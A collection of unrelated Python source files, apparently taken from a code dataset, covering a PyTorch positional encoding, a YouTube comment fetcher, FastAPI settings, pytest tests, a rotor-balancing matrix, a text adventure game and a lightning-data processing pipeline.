super(PositionEncoding, self).__init__()
# Compute the positional encodings once in log space.
pe = torch.zeros(max_len, n_filters) # (L, D)
position = torch.arange(0, max_len).float().unsqueeze(1)
div_term = torch.exp(torch.arange(0, n_filters, 2).float() * - (math.log(10000.0) / n_filters))
pe[:, 0::2] = torch.sin(position * div_term)
pe[:, 1::2] = torch.cos(position * div_term)
self.register_buffer('pe', pe) # buffer is a tensor, not a variable, (L, D)
def forward(self, x):
"""
:Input: (*, L, D)
:Output: (*, L, D) the same size as input
"""
pe = self.pe.data[:x.size(-2), :] # (#x.size(-2), n_filters)
extra_dim = len(x.size()) - 2
for _ in range(extra_dim):
pe = pe.unsqueeze(0)
x = x + pe
return x
def test_pos_enc():
mdl = PositionEncoding()
batch_size = 8
n_channels = 128
n_items = 60
input = torch.ones(batch_size, n_items, n_channels)
out = mdl(input)
print(out)
if __name__ == '__main__':
test_pos_enc()
|
1696843
|
from utils import youtube_authenticate, get_video_id_by_url, get_channel_id_by_url
def get_comments(youtube, **kwargs):
return youtube.commentThreads().list(
part="snippet",
**kwargs
).execute()
if __name__ == "__main__":
# authenticate to YouTube API
youtube = youtube_authenticate()
# URL can be a channel or a video, to extract comments
url = "https://www.youtube.com/watch?v=jNQXAC9IVRw&ab_channel=jawed"
if "watch" in url:
# that's a video
video_id = get_video_id_by_url(url)
params = {
'videoId': video_id,
'maxResults': 2,
'order': 'relevance', # default is 'time' (newest)
}
else:
# should be a channel
channel_id = get_channel_id_by_url(url)
params = {
'allThreadsRelatedToChannelId': channel_id,
'maxResults': 2,
'order': 'relevance', # default is 'time' (newest)
}
# get the first 2 pages (2 API requests)
n_pages = 2
for i in range(n_pages):
# make API call to get all comments from the channel (including posts & videos)
response = get_comments(youtube, **params)
items = response.get("items")
# if items is empty, breakout of the loop
if not items:
break
for item in items:
comment = item["snippet"]["topLevelComment"]["snippet"]["textDisplay"]
updated_at = item["snippet"]["topLevelComment"]["snippet"]["updatedAt"]
like_count = item["snippet"]["topLevelComment"]["snippet"]["likeCount"]
comment_id = item["snippet"]["topLevelComment"]["id"]
print(f"""\
Comment: {comment}
Likes: {like_count}
Updated At: {updated_at}
==================================\
""")
if "nextPageToken" in response:
# if there is a next page
# add next page token to the params we pass to the function
params["pageToken"] = response["nextPageToken"]
else:
# must be end of comments!!!!
break
print("*"*70)
|
1696851
|
from enum import auto
from functools import lru_cache
from typing import Any, Dict, Optional
import sqlalchemy as sa
from pydantic import validator
from fastapi_auth.fastapi_util.settings.base_api_settings import BaseAPISettings
from fastapi_auth.fastapi_util.util.enums import StrEnum
class DatabaseBackend(StrEnum):
postgresql = auto()
sqlite = auto()
@staticmethod
def from_engine(engine: sa.engine.Engine) -> "DatabaseBackend":
return DatabaseBackend(engine.dialect.name)
class DatabaseSettings(BaseAPISettings):
backend: DatabaseBackend = None # type: ignore
user: Optional[str]
password: Optional[str]
host: Optional[str]
db: Optional[str]
sqlalchemy_uri: str = None # type: ignore
log_sqlalchemy_sql_statements: bool = False
min_size: int = 10
max_size: int = 10
force_rollback: bool = False
@validator("sqlalchemy_uri", pre=True, always=True)
def validate_sqlalchemy_uri(cls, v: Optional[str], values: Dict[str, Any]) -> str:
if v is None:
backend = values.get("backend")
backend = backend.value if backend is not None else None
user = values["user"]
password = values["password"]
host = values["host"]
db = values["db"]
v = f"{backend}://{user}:{password}@{host}/{db}"
return v
class Config:
env_prefix = "db_"
@lru_cache()
def get_database_settings() -> DatabaseSettings:
return DatabaseSettings()
|
1696869
|
logs = {
"img": [
"[INFO] Loading input image: {}",
"[ERROR] On '{}': you need to pass the image path!",
"\te.g. --img='Pictures/notNord.jpg'"
],
"out": [
"[INFO] Set output image name: {}",
"[ERROR] On '{}': no output filename specify!",
"\te.g. --out='Pictures/nord.jpg'"
],
"navg": [
"[INFO] No average pixels selected for algorithm optimization",
"[ERROR] On '{}': the average pixels do not take any values!",
"\te.g. --no-average"
],
"pxls": [
"[INFO] Set up pixels width area: {}",
"[INFO] Set up pixels height area: {}",
"[ERROR] On '{}': no value specify within the area pixels!",
"\te.g. --pixels-area=2 or -pa=-4,-3"
],
"blur": [
"[INFO] Blur enabled",
"[ERROR] On '{}': the blur argument do not take any values!",
"\te.g. --blur"
],
"pals": [
"[INFO] Use all color set: {}",
"[INFO] Use palette set: {}",
"\t {} \u2713",
"\t {} \u2718",
"[WARNING] No theme specified, use default Nord theme",
"[WARNING] No set found for: {} \u2753",
],
"err": [
"[INFO] No image created, solve all ERROR and retry."
]
}
|
1696891
|
import abc
import typing as t
from .protocols import UserLike
class UserProvider(abc.ABC): # pragma: no cover
"""User provides perform user look ups over data storages.
These classes are consumed by Authenticator instances
and are not designed to be a part of login or logout process."""
async def find_by_id(self, identifier: t.Any) -> t.Optional[UserLike]:
"""Look up a user by ID."""
raise NotImplementedError()
async def find_by_username(self, username_or_email: str) -> t.Optional[UserLike]:
"""Look up a user by it's identity. Where identity may be an email address, or username."""
raise NotImplementedError()
async def find_by_token(self, token: str) -> t.Optional[UserLike]:
"""Look up a user using API token."""
raise NotImplementedError()
class InMemoryProvider(UserProvider):
"""A user provides that uses a predefined map of users."""
def __init__(self, user_map: t.Mapping[str, UserLike]) -> None:
self.user_map = user_map
async def find_by_id(self, identifier: str) -> t.Optional[UserLike]:
return self.user_map.get(identifier)
async def find_by_username(self, username_or_email: str) -> t.Optional[UserLike]:
return self.user_map.get(username_or_email)
async def find_by_token(self, token: str) -> t.Optional[UserLike]:
return self.user_map.get(token)
|
1696896
|
from collections import OrderedDict
import pytest
from deepspeech.data.alphabet import Alphabet
SYMBOLS = OrderedDict([(symbol, index) for index, symbol in enumerate('abcd')])
@pytest.fixture
def alphabet():
return Alphabet(SYMBOLS.keys())
def test_duplicate_symbol_raise_valuerror():
with pytest.raises(ValueError):
Alphabet('aa')
def test_len(alphabet):
assert len(alphabet) == len(SYMBOLS)
def test_iterator(alphabet):
exp_symbols = list(SYMBOLS.keys())
for index, symbol in enumerate(alphabet):
assert symbol == exp_symbols[index]
def test_get_symbol(alphabet):
for symbol, index in SYMBOLS.items():
assert alphabet.get_symbol(index) == symbol
def test_get_index(alphabet):
for symbol, index in SYMBOLS.items():
assert alphabet.get_index(symbol) == index
def test_get_symbols(alphabet):
sentence = ['a', 'b', 'b', 'c']
indices = [0, 1, 1, 99, 2]
actual = alphabet.get_symbols(indices)
assert len(actual) == len(sentence)
assert all([a == e for a, e in zip(actual, sentence)])
def test_get_indices(alphabet):
sentence = ['a', 'b', 'b', 'invalid', 'c']
indices = [0, 1, 1, 2]
actual = alphabet.get_indices(sentence)
assert len(actual) == len(indices)
assert all([a == e for a, e in zip(actual, indices)])
|
1696920
|
import numpy as np
import tools
import warnings
class Alpha():
"""
Docstring for ALPHA.
Alpha is the an influence coefficient matrix
Influence coefficient matrix is a representation of the change of vibration
vector in a measuring point when putting a unit weight on a balancing plane.
"""
def __init__(self:'Influence matrix', name:'string'=''):
"""
Instantiate an instance of Alpha
name: optional name of Alpha
"""
self.name = name
def add(self, direct_matrix:'np.array'=None, A:'intial_vibraion numpy.array'=None,
B:'trial matrix numpy.array'=None, U:'trial weight row vector numpy.array'=None,
keep_trial:'optional keep the previous trial weight in every succeeding trial'=False,
name:'string'=''):
'''
Method to add new values for Alpha instance
either the direct_matrix is needed or ALL of (A, B, U)
Args:
direct_matrix: numpy array M rows -> measuring points,
N columns -> balancing planes
A: Initial vibration column array -> numpy array
B: Trial matrix MxN array -> numpy array
U: Trial weights row array -> numpy array
alpha = (A - B) / U
'''
try: # test if direct input
_ = direct_matrix.shape # TODO raise error when matrix is 1 dim
if direct_matrix.shape[0] >= direct_matrix.shape[1]:
self.value = direct_matrix
else:
raise tools.CustomError('Number of rows(measuring points) should be '
'equal or more than the number of columns '
'(balancing planes)!')
except AttributeError:
# if direct matrix is not input calculate it from A, B, U
# test the exstiance of A, A0, B, U to calculate ALPHA
try:
all([A.shape, B.shape, U.shape])
# Test dimensions
if A.shape[1] > 1:
raise tools.CustomError('`A` should be column vector')
elif U.ndim > 1:
raise tools.CustomError('`U` should be row vector')
elif B.shape[0] != A.shape[0] or B.shape[1] != U.shape[0]:
raise tools.CustomError('`B` dimensions should match `A`and `U`')
else:
if not keep_trial:
self.value = (B - A) / U
else:
_A_keep_trial = np.delete((np.insert(B, [0], A, axis=1)),
-1, axis=1)
self.value = (B - _A_keep_trial) / U
except AttributeError:
raise tools.CustomError('Either direct_matrix or (A,B,U) '
'should be passed "numpy arrays"')
def check(self, ill_condition_remove=False):
'''
Method to check the alpha value
* check the symmetrical of the matrix (check for square matrix only,
for square matrix it should be symmetric obeyin the reciprocity law)
* check for ill conditioned planes:
if for any reason two or more planes has independent readings
for example [[1, 2 , 3], [2, 4, 6]] this is named as ill-conditioned planes
as they does not carry new information from the system and considering them
cause solution infliteration.
ill_condition_remove = True : remove the ill_condition planes after the check
'''
self.M = self.value.shape[0]
self.N = self.value.shape[1]
if self.M == self.N:
_check_sym = np.allclose(self.value, self.value.T, 0.1, 1e-06)
if not _check_sym:
warnings.warn('Warning: Influence Matrix is asymmetrical!')
_check_status_sym = 'Influence Matrix is asymmetrical, check your data'
else:
_check_status_sym = 'Influence Matrix is symmetric --> OK'
else:
_check_status_sym = 'Not a square matrix --> no exact solution'
# Checking ILL-CONDITIONED planes
ill_plane = tools.ill_condition(self.value)
if ill_plane:
_check_ill_condition = 'Ill condition found in plane{}'.format(ill_plane)
if ill_condition_remove:
self.value = np.delete(self.value,[ill_plane], axis=1)
else:
_check_ill_condition ='No ill conditioned planes --> ok'
return print('{}\n\n{}'.format(_check_status_sym, _check_ill_condition))
|
1696923
|
class Player:
def __init__(
self,
username: str,
player_class,
):
self.username = username
self.invetory = Inventory()
self.player_class = player_class
self.skills = None
self.gender = None
self._count = 0
self.directions = {
'start': {
'forest':
'You are in a forest, look around... the silence, the trees, you are trying'
'to figure how you came here, how this even happened to you'
', but the only thing you know, is that you are about to start your path'
', please, just follow your lead here, you are alone now.\n\n Type the command: ',
},
'north': [{
'Palace of Nather': {
'Description': 'bla bla bla bla',
'Items': {
'rope': 1,
'gold': 0.2,
'arrows': 1
},
'Options': [],
'Enemies': {}
}
}, {
'<NAME>': {
'Description': 'bla bla bla bla',
'Items': {
'rope': 1,
'gold': 0.2,
'arrows': 1
},
'Options': [],
'Enemies': {
'The big Joint': {
'hp': 300,
'level': 15,
'items': {
'gold': 150
}
}
}
}}
],
'south': {
},
'east': {
},
'west': {
},
}
self.CHAR_CLASSES = {
'WIZARD': {
'HP': 100,
'INTELLIGENCE': 60,
'PHYSICAL': 10,
'SKILLS': 80,
'SPEED': 30,
'HEAVY_WEAPONS': 5
},
'FIGHTER': {
'HP': 100,
'INTELLIGENCE': 10,
'PHYSICAL': 70,
'SKILLS': 30,
'SPEED': 70,
'HEAVY_WEAPONS': 40
},
'ORC': {
'HP': 100,
'INTELLIGENCE': 10,
'PHYSICAL': 90,
'SKILLS': 5,
'SPEED': 20,
'HEAVY_WEAPONS': 90
},
}
self.actual_location = self.directions['start']['forest']
def set_username(self, new_username):
self.username = new_username
@property
def show_own_invetory(self):
return self.invetory.show_attributes()
def player_class_selection(
self,
char_class_picked: str
):
self.player_class = char_class_picked
def set_skills(self):
name_of_the_char_class = self.player_class
self.skills = self.CHAR_CLASSES[name_of_the_char_class]
def traveling(self, direction):
possible_directions = self.directions.keys()
if direction not in possible_directions:
return 'Not a valid direction'
else:
self._change_location(direction)
def _change_location(self, direction):
number_of_places_direction_has = len(self.directions[direction])
if self._count == number_of_places_direction_has:
return 'you should go back'
else:
self._count += 1
self.actual_location = self.directions[direction][self._count]
@property
def catch_actual_location(self):
return self.actual_location
class Inventory:
def __init__(
self,
rope: int = 0,
leather: int = 0,
meat: int = 0,
gold: int = 0,
arrows: int = 0
):
self.rope = rope
self.leather = leather
self.meat = meat
self.gold = gold
self.arrows = arrows
def add_to_attribute(
self,
attr,
quantity: int = 0
):
if hasattr(self, attr):
sum_of_old_and_new_quantity = self.__getattribute__(attr) + quantity
self.__setattr__(attr, sum_of_old_and_new_quantity)
else:
raise AttributeError
@property
def show_attributes(self):
return (
f'Rope: {self.rope} \n'
f'Leather: {self.leather}\n'
f'Meat: {self.meat}\n'
f'Gold: {self.gold}\n'
f'Arrows: {self.arrows}\n'
)
class Journey:
def __init__(self):
self.player = None
def get_player(self, username, char_class):
self.player = Player(
username=username,
player_class=char_class
)
return self.player
if __name__ == '__main__':
from time import sleep
input_username = input('insert the name of your character: ')
sleep(2)
print(
f'Hello {input_username.capitalize()}, It is now your turn to become '
f'a legend! Please choose your class: \n'
)
setting_player = Journey()
player = setting_player.get_player(
username=input_username,
char_class=None
)
list_of_char_classes = list(setting_player.player.CHAR_CLASSES.keys())
sleep(2)
for char_classes in list_of_char_classes:
print(f'{list_of_char_classes.index(char_classes) + 1} - {char_classes}')
sleep(0.5)
input_class = int(input('Select now your class warrior! The number please: '))
player.player_class = list_of_char_classes[input_class - 1]
player.set_skills()
print(f'\nYou choose the {player.player_class} class, look at your statuses: \n')
for status, value in player.CHAR_CLASSES[list_of_char_classes[input_class - 1]].items():
print(f'{status}: {value}')
sleep(4)
print(
'\nWell done soldier! Now you are able to start the most'
' incredible adventures in the world!'
)
print('LOADING ...')
sleep(4)
print(
'\nThis is your first world, prepare to find '
'tones of kinds of creatures on your way. \n'
'You may think this is insane, but the truth is: '
'No one ever returned back from this quest. \n'
'If you think now is the right time for you to ',
'make something great, this challenge is for you. \n'
)
print('*'*40 + '\n')
sleep(2)
print(
'First you need the instructions, here I will show how to play.\n'
'For every action you may take, questions will be showed for you'
', that means you have to choose according to instructions in screen.\n'
' For instance: \n'
)
command = ''
print(f'Your actual location is {player.catch_actual_location}')
while command != 'exit':
command = input(' >>> ')
if command == 'look':
print(location)
elif command == 'north':
location = player.catch_actual_location
player.traveling('north')
for title in location.keys():
print(f'Welcome to {title.upper()}:\n'
f'{location[title]}')
|
1696976
|
from __future__ import absolute_import
from __future__ import print_function
import glob
import gc
import numpy as np
from lmatools.stream.subset import coroutine
from lmatools.density_tools import unique_vectors
import logging
log = logging.getLogger(__name__)
log.addHandler(logging.NullHandler())
# --------------------------------------------------------------------------
# ----- This section could be replaced with stormdrain.pipeline imports ----
# --------------------------------------------------------------------------
# class map_projector(object):
# def __init__(self, ctr_lat, ctr_lon, proj_name='eqc'):
# self.mapProj = MapProjection(projection=proj_name, ctrLat=ctr_lat, ctrLon=ctr_lon, lat_ts=ctr_lat, lon_0=ctr_lon)
# self.geoProj = GeographicSystem()
#
# def __call__(self, lon, lat, alt):
# x,y,z = self.mapProj.fromECEF(
# *self.geoProj.toECEF(lon, lat, alt)
# )
# return x, y, z
#
# @coroutine
# def map_projector(ctr_lat, ctr_lon, target, proj_name='eqc'):
# mapProj = MapProjection(projection=proj_name, ctrLat=ctr_lat, ctrLon=ctr_lon, lat_ts=ctr_lat, lon_0=ctr_lon)
# geoProj = GeographicSystem()
# while True:
# lon, lat, alt = (yield)
# x,y,z = self.mapProj.fromECEF(
# *self.geoProj.toECEF(lon, lat, alt)
# )
# target.send((x,y,z))
# --------------------------------------------------------------------------
# --------------------------------------------------------------------------
# --------------------------------------------------------------------------
@coroutine
def flash_count_log(logfile, format_string="%s flashes in frame starting at %s"):
""" Write flash count for some frame to a file-like object. File open/close should be handled
by the calling routine."""
# Track flash count for each frame
frame_times = {}
try:
while True:
# Receive list of flashes, frame start time
flashes, frame_start_time = (yield)
n_flashes = len(flashes)
try:
frame_times[frame_start_time] += n_flashes
except KeyError:
# Key doesn't exist, so can't increment flash count
frame_times[frame_start_time] = n_flashes
except GeneratorExit:
all_times = list(frame_times.keys())
all_times.sort()
for frame_start_time in all_times:
flash_count_status = format_string % (frame_times[frame_start_time], frame_start_time)
if hasattr(logfile, 'write'):
logfile.write(flash_count_status+'\n')
else:
logfile.info(flash_count_status)
@coroutine
def filter_flash(target, min_points=10):
""" Filters flash by minimum number of points.
"""
while True:
evs, flash = (yield) # Receive a flash
if (flash['n_points'] >= 10):
target.send((evs, flash))
del evs, flash
def stack_chopped_arrays(chop_sequence):
""" Given a sequence of lists of arrays, return an equal length sequence
where the arrays have been combined by position in the original sequence.
The lists of arrays must each be of the same length. This is useful when
there is a list of arrays corresponding to data subdivided into time
series chunks.
In the example below, each row is data from a different file (letters)
and each column is a different time window in a time series. By stacking
the columns, a combined time series is generated.
([a0, a1, a2, a3],
[b0, b1, b2, b3],
[c0, c1, c2, c3],)
becomes
[a0+b0+c0, a1+b1+c1, a2+b2+c2, a3+b3+b3]
where plus indicates concatenation
"""
combined = [np.hstack(a) for a in zip(*chop_sequence)]
return combined
class ArrayChopper(object):
""" Initialized with an array of N_+1 edges corresponding to N
windows. The edges are assumed to be sorted.
Methods
window_masks(data, edge_key=None): given an array of data with a named dtype,
return a list of boolean masks that can be used to index data,
giving the subset of data which corresponds to each window.
If an edge_key is provided, it is assumed to reference a named array
and masking is performed on data[edge_key]
chop(data, edge_key=None): Returns a list of arrays where the
masks described above have been applied to chop the data
Generator functions for each of the above are also available
gen_window_masks, gen_chop
"""
def __init__(self, edges):
self.edges = edges
def _apply_edge_key(self, data, edge_key):
if edge_key is not None:
d = data[edge_key]
else:
d = data
return d
def gen_edge_pairs(self):
for l, r in zip(self.edges[:-1], self.edges[1:]):
yield l, r
def window_masks(self, data, edge_key=None):
masks = [w for w in self.gen_window_masks(self, data, edge_key)]
return masks
def gen_window_masks(self, data, edge_key=None):
d = self._apply_edge_key(data, edge_key)
for l, r in self.gen_edge_pairs():
# make sure this is only one-side inclusive to eliminate double-counting
within = (d >= l) & (d < r)
yield within
def chop(self, data, edge_key=None):
chopped = [d for d in self.gen_chop(data, edge_key)]
return chopped
def gen_chop(self, data, edge_key=None):
# d = self._apply_edge_key(data, edge_key)
for mask in self.gen_window_masks(data, edge_key):
yield data[mask]
@coroutine
def flashes_to_frames(time_edges, targets, time_key='start', do_events=False,
time_edges_datetime=None, flash_counter=None):
""" time_edges_datetime is same len as time_edges but with datetime objects
instead of floats.
When paired with extract_events_for_flashes, and events=False, the
flashes are placed in the correct time frame, and any events from that
flash, including those that cross a time boundary, are included.
if do_events='event_time_key', then also subset the events. This
operation is naive, i.e., the events are selected by time with no
attempt to keep events together with their parent flash. Therefore, it
is important to ensure that events and flashes are sent together in
chunks that do not cross time boundaries, which implies pre-aggregating
and time-tagging the event data so that the events and flashes remain
together when naively subset. If those conditions are met then this
option allows one to set up a pipeline without an additional
extract_events_for_flashes step.
"""
if time_edges_datetime is None:
# print "Datetime-style time edges not found, using time edges in seconds for flash count label"
time_edges_datetime = time_edges
flash_count_messages = []
assert len(time_edges) == (len(time_edges_datetime))
assert len(time_edges) == (len(targets)+1)
while True:
events, flashes = (yield)
start_times = flashes[time_key]
sort_idx = np.argsort(start_times) #, order=[time_key])
idx = np.searchsorted(start_times[sort_idx], time_edges)
slices = [slice(*i) for i in zip(idx[0:-1], idx[1:])]
if do_events != False:
ev_start_times = events[do_events]
ev_sort_idx = np.argsort(ev_start_times)
ev_idx = np.searchsorted(ev_start_times[ev_sort_idx], time_edges)
ev_slices = [slice(*i) for i in zip(ev_idx[0:-1], ev_idx[1:])]
else:
ev_slices = range(len(time_edges))
for target, s, ev_s, frame_start_time in zip(targets,
slices, ev_slices, time_edges_datetime[:-1]):
these_flashes = flashes[sort_idx][s]
if do_events != False:
these_events = events[ev_sort_idx][ev_s]
else:
these_events = events
if flash_counter is not None:
flash_counter.send((these_flashes, frame_start_time))
# flash_count_status = "Sending %s flashes to frame starting at %s" % (len(these_flashes), frame_start_time)
# flash_count_messages += flash_count_status
# print flash_count_status
target.send((these_events, these_flashes))
del events, flashes, start_times, sort_idx, idx, slices
log.info(flash_count_messages)
def event_yielder(evs, fls):
for fl in fls:
these_events = evs[evs['flash_id'] == fl['flash_id']]
# if len(these_events) <> fl['n_points']:
# print 'not giving all ', fl['n_points'], ' events? ', these_events.shape
for an_ev in these_events:
yield an_ev
@coroutine
def extract_events_for_flashes(target, flashID_key='flash_id'):
""" Takes a large table of events and grabs only the events belonging to the flashes.
"""
while True:
evs, fls = (yield)
# print 'extracting events'
# event_dtype = evs[0].dtype
event_dtype = evs.dtype
events = np.fromiter( (event_yielder(evs, fls)) , dtype=event_dtype)
# The line below (maybe maybe maybe)
# events = np.fromiter((evs[evs['flash_id'] == fl['flash_id']] for fl in fls), dtype=event_dtype)
# does the same thing as the two following lines, but is 10x slower.
# The 'mapper' could actually be optimized further by calculating it globally, once per events table,
# but this is fast enough and saves having to pass through another variable.
# mapper = dict(zip(evs['flash_id'],evs))
# events = np.fromiter( (mapper[fl['flash_id']] for fl in fls), dtype=event_dtype)
target.send((events, fls))
del events, evs, fls
# @coroutine
# def extract_events(target, flashID_key='flash_id'):
# """ Takes a large table of events and grabs only the events belonging to the flash.
# This is useful if you filter out a bunch of flashes before going to the trouble of
# reading the flashes in.
# """
# while True:
# evs, flash = (yield)
# flash_id = flash[flashID_key]
# event_dtype = evs[0].dtype
# # events = [ev[:] for ev in evs if ev[flashID_key] == flash_id]
# # events = np.asarray(events, dtype=event_dtype)
# # events = evs[:]
# events = evs[evs[flashID_key]==flash_id]
# # events = np.fromiter((ev[:] for ev in evs if ev[flashID_key] == flash_id), dtype=event_dtype)
# target.send((events, flash))
@coroutine
def no_projection(x_coord, y_coord, z_coord, target, use_flashes=False):
while True:
events, flashes = (yield)
if use_flashes==True:
points = flashes
else:
points = events
x,y,z = points[x_coord], points[y_coord], points[z_coord]
target.send((events, flashes, x,y,z))
del events, flashes, x,y,z, points
@coroutine
def project(x_coord, y_coord, z_coord, mapProj, geoProj, target,
use_flashes=False, transform=True):
""" Adds projected coordinates to the flash and events stream"""
while True:
events, flashes = (yield)
if use_flashes==True:
points = flashes
else:
points = events
if transform:
x,y,z = mapProj.fromECEF(*geoProj.toECEF(
points[x_coord], points[y_coord], points[z_coord]))
else:
x,y,z = points[x_coord], points[y_coord], points[z_coord]
target.send((events, flashes, np.atleast_1d(x),
np.atleast_1d(y), np.atleast_1d(z)))
del events, flashes, x,y,z, points
@coroutine
def footprint_mean(flash_id_key='flash_id', area_key='area'):
""" Takes x, y, z flash locations and gets
Extent density unique pixels, average all flashes
"""
while True:
events, flash, x,y,z = (yield)
# print 'Doing extent density',
x_i = np.floor( (x-x0)/dx ).astype('int32')
y_i = np.floor( (y-y0)/dy ).astype('int32')
if len(x_i) > 0:
footprints = dict(list(zip(flash[flash_id_key], flash[area_key])))
# print 'with points numbering', len(x_i)
unq_idx = unique_vectors(x_i, y_i, events['flash_id'])
# if x[unq_idx].shape[0] > 1:
fl_id = events['flash_id'][unq_idx]
areas = [footprints[fi] for fi in fl_id] #puts areas in same order as x[unq_idx], y[unq_idx]
# counts normalized by areas
target.send((x[unq_idx],y[unq_idx],areas))
del footprints, unq_idx, fl_id, areas
# else:
# print ''
del events, flash, x, y, z, x_i, y_i
@coroutine
def footprint_mean_3d(flash_id_key='flash_id', area_key='area'):
""" Takes x, y, z flash locations and gets
Extent density unique pixels, average all flashes
"""
while True:
events, flash, x,y,z = (yield)
# print 'Doing extent density',
x_i = np.floor( (x-x0)/dx ).astype('int32')
y_i = np.floor( (y-y0)/dy ).astype('int32')
z_i = np.floor( (z-z0)/dz ).astype('int32')
if len(x_i) > 0:
footprints = dict(list(zip(flash[flash_id_key], flash[area_key])))
# print 'with points numbering', len(x_i)
unq_idx = unique_vectors(x_i, y_i, z_i, events['flash_id'])
# if x[unq_idx].shape[0] > 1:
fl_id = events['flash_id'][unq_idx]
areas = [footprints[fi] for fi in fl_id] #puts areas in same order as x[unq_idx], y[unq_idx]
# counts normalized by areas
target.send((x[unq_idx],y[unq_idx],z[unq_idx],areas))
del footprints, unq_idx, fl_id, areas
# else:
# print ''
del events, flash, x, y, z, x_i, y_i, z_i
@coroutine
def point_density(target, weight_key=None, weight_flashes=True,
flash_id_key='flash_id', event_grid_area_fraction_key=None):
""" Sends event x, y, z location directly. If weight_key is provided
also extract the weights from the flash data with variable name matching
weight_key. if weight_flashes=False, use the event data instead of the
flash data.
"""
while True:
events, flash, x, y, z = (yield)
# print 'Doing point density',
x = np.atleast_1d(x)
y = np.atleast_1d(y)
if len(x) > 0:
if weight_key is not None:
if weight_flashes:
weight_lookup = dict(list(zip(flash[flash_id_key],
flash[weight_key])))
#puts weights in same order as x, y
weights = np.fromiter((weight_lookup[fi] for fi in
events['flash_id']), dtype='float64')
else:
weights = events[weight_key]
else:
weights = None
log.debug('with points numbering %s'.format(len(x)))
target.send((x, y, weights))
del events, flash ,x,y,z
@coroutine
def point_density_3d(target, weight_key=None, weight_flashes=True,
flash_id_key='flash_id'):
""" Sends event x, y, z location directly. If weight_key is provided
also extract the weights from the flash data with variable name matching
weight_key. if weight_flashes=False, use the event data instead of the
flash data.
"""
while True:
events, flash, x, y, z = (yield)
# print 'Doing point density',
if len(x) > 0:
if weight_key is not None:
if weight_flashes:
weight_lookup = dict(list(zip(flash[flash_id_key],
flash[weight_key])))
#puts weights in same order as x, y
weights = np.fromiter((weight_lookup[fi] for fi in
events['flash_id']), dtype='float64')
else:
weights = events[weight_key]
else:
weights = None
log.debug('with points numbering %s'.format(len(x)))
target.send((x, y, z, weights))
del events, flash ,x,y,z
@coroutine
def flash_std(x0, y0, dx, dy, target, flash_id_key='flash_id', weight_key=None):
""" This function assumes a regular grid in x and y with spacing dx, dy
x0, y0 is the x coordinate of the lower left corner of the lower-left grid cell,
i.e., the lower left node of the grid mesh in cartesian space
Eliminates duplicate points in gridded space and sends the reduced
set of points to the target.
NOTE: Use of this function is to only find the standard deviation of flash size.
"""
while True:
# assumes x,y,z are in same order as events
events, flash, x,y,z = (yield)
# print 'Doing extent density',
x_i = np.floor( (x-x0)/dx ).astype('int32')
y_i = np.floor( (y-y0)/dy ).astype('int32')
if len(x_i) > 0:
log.debug(('extent with points numbering', len(x_i), ' with weights', weight_key))
unq_idx = unique_vectors(x_i, y_i, events[flash_id_key])
# if x[unq_idx].shape[0] > 1:
if weight_key != None:
weight_lookup = dict(list(zip(flash[flash_id_key], flash[weight_key]**2.)))
weights = [weight_lookup[fi] for fi in events[unq_idx]['flash_id']] #puts weights in same order as x[unq_idx], y[unq_idx]
del weight_lookup
else:
weights = None
target.send((x[unq_idx], y[unq_idx], weights))
del weights, unq_idx
# else:
# print ''
del events, flash, x, y, z, x_i, y_i
@coroutine
def flash_std_3d(x0, y0, z0, dx, dy, dz, target, flash_id_key='flash_id', weight_key=None):
""" This function assumes a regular grid in x and y with spacing dx, dy
x0, y0 is the x coordinate of the lower left corner of the lower-left grid cell,
i.e., the lower left node of the grid mesh in cartesian space
Eliminates duplicate points in gridded space and sends the reduced
set of points to the target.
"""
while True:
# assumes x,y,z are in same order as events
events, flash, x,y,z = (yield)
# print('Doing extent density',)
x_i = np.floor( (x-x0)/dx ).astype('int32')
y_i = np.floor( (y-y0)/dy ).astype('int32')
z_i = np.floor( (z-z0)/dz ).astype('int32')
log.debug(len(x_i))
if len(x_i) > 0:
log.info(('extent with points numbering', len(x_i), ' with weights', weight_key))
unq_idx = unique_vectors(x_i, y_i, z_i, events[flash_id_key])
# if x[unq_idx].shape[0] > 1:
if weight_key != None:
weight_lookup = dict(list(zip(flash[flash_id_key], flash[weight_key]**2.)))
weights = [weight_lookup[fi] for fi in events[unq_idx]['flash_id']] #puts weights in same order as x[unq_idx], y[unq_idx]
del weight_lookup
else:
weights = None
target.send((x[unq_idx], y[unq_idx], z[unq_idx], weights))
del weights, unq_idx
# else:
# print ''
del events, flash, x, y, z, x_i, y_i, z_i
@coroutine
def extent_density(x0, y0, dx, dy, target, flash_id_key='flash_id',
weight_key=None, event_grid_area_fraction_key=None):
""" This function assumes a regular grid in x and y with spacing dx, dy
x0, y0 is the x coordinate of the lower left corner of the lower-left grid cell,
i.e., the lower left node of the grid mesh in cartesian space
Eliminates duplicate points in gridded space and sends the reduced
set of points to the target.
"""
while True:
# assumes x,y,z are in same order as events
events, flash, x,y,z = (yield)
# print 'Doing extent density',
x_i = np.floor( (x-x0)/dx ).astype('int32')
y_i = np.floor( (y-y0)/dy ).astype('int32')
test_flash_id = 53735
if len(x_i) > 0:
log.info(('extent with points numbering', len(x_i), ' with weights', weight_key))
unq_idx = unique_vectors(x_i, y_i, events[flash_id_key])
# if x[unq_idx].shape[0] > 1:
if weight_key != None:
weight_lookup = dict(list(zip(flash[flash_id_key], flash[weight_key])))
#puts weights in same order as x[unq_idx], y[unq_idx]
weights = np.fromiter((weight_lookup[fi] for fi in
events[unq_idx]['flash_id']), dtype='float64')
# del weight_lookup
else:
weights = None
if event_grid_area_fraction_key is not None:
# Each event with a unique index is replicated above
# with the representative value for the flash (weights = None
# implies a weight of +1 for each flash). If there is knowledge
# of how much of the underlying grid cell each event fills
# (e.g. from pixel-based event detector), then we can modify
# the weights by how much of the grid cell is filled.
# The logic here presumes that any of the events in the grid
# cell cover as much area as any other, i.e., that the pixels
# doing the event detection don't move during the time of the
# flash.
grid_frac = events[unq_idx][event_grid_area_fraction_key]
else:
grid_frac = None
# Diagnostics
# test_flash_mask = (events['flash_id'] == test_flash_id)
# test_events = events[test_flash_mask]
# if (test_flash_mask.sum() > 0) & (weight_key == 'area'):
# print("Data for flash {0}".format(test_flash_id))
# mesh_xi = test_events['mesh_xi']
# mesh_yi = test_events['mesh_yi']
# mesh_frac = test_events['mesh_frac']
# mesh_t = test_events['time']
# for vals in zip(mesh_t, mesh_frac,
# mesh_xi, x_i[test_flash_mask],
# mesh_yi, y_i[test_flash_mask],
# ):
# print(vals, weight_lookup[test_flash_id])
#
# test_flash_mask = (events[unq_idx]['flash_id'] == test_flash_id)
# test_events = events[unq_idx][test_flash_mask]
